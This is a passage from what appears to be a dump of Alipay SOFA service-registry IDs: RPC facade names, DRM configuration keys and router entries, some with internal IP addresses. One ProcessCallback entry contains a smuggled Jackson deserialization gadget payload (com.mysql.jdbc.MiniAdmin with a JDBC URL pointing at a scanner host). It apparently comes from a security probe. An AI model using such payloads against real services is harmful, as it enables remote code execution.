onfig.ignoreSignCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapires.facade.securityinfo.ExterfaceSecurityInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.MerchantInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paycore.PmtTransCodeCfgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insclaiminvestprod.common.core.service.facade.InvestQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.budgetcore.common.service.facade.api.BudgetManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.graycore.common.service.facade.api.strategy.StrategyTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.opscloudcore.common.service.facade.adaptor.mobileops.MobileopsFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.TransferInProtocolService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.SendScheduleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.trade.facade.basetrade.ISellerTradeCancelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.cif:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.accountNoSwitcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.forexprod.common.service.facade.ForexLiquidationDetailQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imaspmng.common.service.facade.RightManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antpim.requirement.service.facade.BizDomainQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:findefencecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:mapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxagg.common.service.facade.api.management.video.VideoCommentMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.232.221#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ordermng.common.service.api.order.ProtocolService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0:insurance_insmktdds@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ebppprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transferprod.common.service.facade.api.RealNameCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.pamir.operator.PamOperatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.finbatch.biz.service.impl.drm.FinbatchCommonDRM.fileUniqueExchangeCodeBlacklist,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.permlimit:name=com.alipay.revol.drm.LogConfig.logFilterJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zskynet:name=com.alipay.common.security.dresource.SecurityCommonDrm.totalUrlDecodeTimes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.crmhome.common.service.integration.mobilelbs.GeocodeServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:paycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.orderlink.OrderLinkBatchOperateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.arcore.ApplyAccountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:userdataconsumer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.mng.AbilityDynamicQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tallycore.common.service.facade.AccountBookQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:transferprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.PayChannelUniversalDecisionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.account.query.TaobaoBindingQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:inshealthybff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableJdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bketencop_processCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.EmbezzleTaskAnalysisFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0:edge_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ecdcc:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.custcenter.service.antg.facade.archive.AntArchiveFaceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.app.AppManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.finbatch.biz.service.impl.drm.FinbatchCommonDRM.zqSyncSendList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.trsbrain.common.service.facade.spi.BizSelfCureServiceFacade:1.0:ichecker-selfcure@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:rockcode@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.common.service.facade.NotifyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.smart.RccenterDeclareStasticFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.c2c.reward.RewardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.4.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.jarguard.facade.JarRemoteServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","dchainassetreg@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.contentlib.common.service.facade.common.ContentGlobalStatTotalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.biz.shared.migration.service.MigrationTrService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_MYTEST_DRAWLOTTERY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.socialcore.facade.ps.user.UserSkillInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.acapi.sofarest.OpenapiSofaRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-S-kbinteligentpromo-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.minicenter.common.service.facade.api.template.TemplateConfigOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.TransNotradeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.admin.service.ActionPacketFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pamir.coreclient.attr.AttrProviderService:1.0:promohelix@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.config-security-false:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.mosn.MosnAppInvokeService:1.0:tsm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.apcontainersrv.common.service.facade.linke.LinkEBuildFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.leads.ClueLeadsManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobot.service.facade.mng.api.GeneralTaskMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricecenter.common.service.facade.api.price.PriceArApplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.FieldCheckStatisticsCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:couponcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.hbase.FinOutfluxHbaseQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gclearingcenter.facade.api.GclearingSliceClearingTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.ucdp.common.service.facade.query.CreativeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.merchant.common.service.facade.ops.OpsCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprocess.sip.action.Action:1.0:taskCreateTradePunishAction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.genericmerchant.facade.StaffQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_relieveFinishRemit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetdecision.common.service.facade.api.StrategyFactorConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.imemberprod.service.facade.api.ApplyCloseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imdop.common.service.facade.AreaPermissionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:scfmngFqzblCreditQuotaModelCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.facade.api.IntelliBenchIndexService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.service.facade.lifecycle.zhima.RegistrationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.96.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antcloud.yunyou.facade.IterationFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.aciamcore.common.service.facade.common.TranslationServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.cloud.osp.instance.facade.ProductInstanceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.constraintOrderStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.giftprod.common.service.facade.word.WordActivityUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mbill.common.service.facade.MbillVoucherFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.bizrecon.QueryAlipayDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aliinvoiceprod.integration.einvoice.EinvoiceMerchantServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.FreezeReceiptService:1.0:tradecore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.OperationLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.arkschedulerfacade.ArkSchedulerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.charge:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.biz.shared.statistics.ResultRecordStatisticsService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@finopencore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","config:com.alipay.mobileappcommon.common.service.facade.baas.SwitchConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mfinpromo.common.service.facade.api.goal.TaskBizCodeManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.InjectFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchiscore.rabbit.common.service.facade.RabbitPluginConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tbase.TBaseTenantWorkflowFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchprod.common.service.facade.operate.MrchProdMerchantLogPageQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcloudfunds.service.manage.api.QueryMerchantSubAccountInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.VoucherConfigResource.pushApprove,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","arater@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.138.17#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.167.175.213#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.prodquery.common.service.facade.standard.api.product.CommonRefreshServiceFacade:1.0:ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.224.248#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opencore.service.facade.UserInfoShareConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.ps.pool.UserPoolManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpChargeTairRz.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifemng.facade.ebpp.ChargeInstFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.19.28.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fcbuservice.common.service.facade.ProdActionFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetcore.common.service.risk.facade.AssetPackageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mda_AntProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.195.210#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY@fincommontaskhub#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.paymentmng.service.facade.payacceptance.AgrtProductManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitysimulate.common.service.client.antq.AntqMsgConsumer:1.0:securityops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_EC_MWALLETMNG_WIDGET_RECORD_TASK_DATA_CLEAR_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.secuprod.biz.community.user.PhotoUploadService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.activity.facade.gzone.history.ModificationHistoryGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.yeb.repository.GzoneLogicDbBalanceProfitRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:promofrontcenter#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.taskcenter.common.service.facade.TaskOperateHistoryQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alcontract.common.service.facade.NoticeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.useDingqiInTestFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.benefitcore.common.service.facade.api.BenefitLifeSummaryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirecore.common.service.facade.api.OrderCancelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_CONSUME#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.nodejs.ConsumerService:1.0:context-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:zmepcreditwebsite#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.merchant.common.service.facade.OrderService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.access.ActionServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.keplerfeature:name=com.alipay.vega.integration.kepler.drm.EventDrm.eventSkipList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:riskAdmitHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.ProjectDeliverFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-doutukoi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.178.161#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.yuyan.keeper.ConsumerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.service.RegionRouterServiceFacade:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.spi.OperationConfigCallbackFacade:1.0:adexchange@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFundNewsEventMonitorResource.monitorRules,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:[\"com.mysql.jdbc.MiniAdmin\",\"jdbc:mysql://33024869-uniqueId-104002004.jackjson.antscanner.global.alipay.com\"]@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.module.merchant.facade.api.migrate.MigrateEntityManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_FINANCE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.45.148.186#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.acquirecenter.common.service.facade.api.CancelApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.l2cache.L2CacheClientSwitch.readL1Cache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_M_BP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.chatresource.drm.ChatResourceDRM.chatRoomTypes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kgengine.open.facade.java.AkgSchemaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.test:name=com.alipay.fc.iriskperceptcenter.rpoints.drm.RpointsCommonConfigResource.indicatorMetaInfoDelimiter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.voucherprod.facade.api.voucher.VcpVoucherManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaexprod.comon.service.facade.rate.RatePromotionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.25.191.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchprod.common.service.facade.operation.MethodInvokeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0:mobilepepAccessApplyFormSuccessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.astaralarm.common.service.facade.BlueArmyManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcservcenter.client.RcClientInvoker:1.0:cstrategycenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitydatastudio:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securityexprod.biz.alipayauth.service.AlipayAuthMicFaceVerifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.AdvisorReportFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.auth_center.common.service.facade.v2.service.AuthCodeCompitableService:1.0:internal@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.core.facade.CIPullModeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.45.37#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cloudbox.facade.spi.PaaSOperationFacade:1.0:SERVERLESS-PAAS@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.xb.XbPortfolioFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:cn.com.antcloud.common.auth.foundation.facade.AuthInfrastructureServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.mwalletmng:name=com.alipay.mwalletmng.web.infoview.drm.InfoviewResourceDRM.webCateMaxTagCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","contentweb@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finopencore.common.service.point.facade.PointFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.hainaprod.common.service.facade.api.abos.AbosEnterpriseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.zskynet.facade.spi.BizSolutionQueryFacade:1.0:trsbrain@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mrp:name=com.alipay.mrp.common.service.integration.drm.SysParamService.whitelistConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.aciamcore.common.service.facade.access.OauthCodeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.activity.ActivityEnrolmentFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mindv.okcourse.service.OkCourseReachService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_1210_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:openhome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.question.facade.QuestionRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.178.163#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zcache:name=com.alipay.zdal.ldc.tair.yingxutestGZTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchprod.common.service.facade.order.MerchantOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.228.226#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.acquirefront.service.facade.api.standard.AcquireStandardCreateAndPayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@cashier#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.sofa.rpc.elastic.ElasticService:1.0:shendiao@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.facade.SSOFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.operator.common.service.facade.OperatorTreeQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.knowledge.facade.KnowledgeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.17#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.SwitchExterfaceInvokeToUtpResource.batchRefundNoPwdOutStrategy,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antcloud.cloudauth.common.service.facade.security.SecurityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.UserViewInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.mobile.message.MessageNotificationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.salesmng.common.service.facade.merchant.api.CrmMerchantRelationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.identitydecision.common.service.facade.decision.DecisionFacade:1.0:identitydecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.forexprod.common.service.facade.ForexMerchantWService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.businessconfig.HomePageNonstopFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapters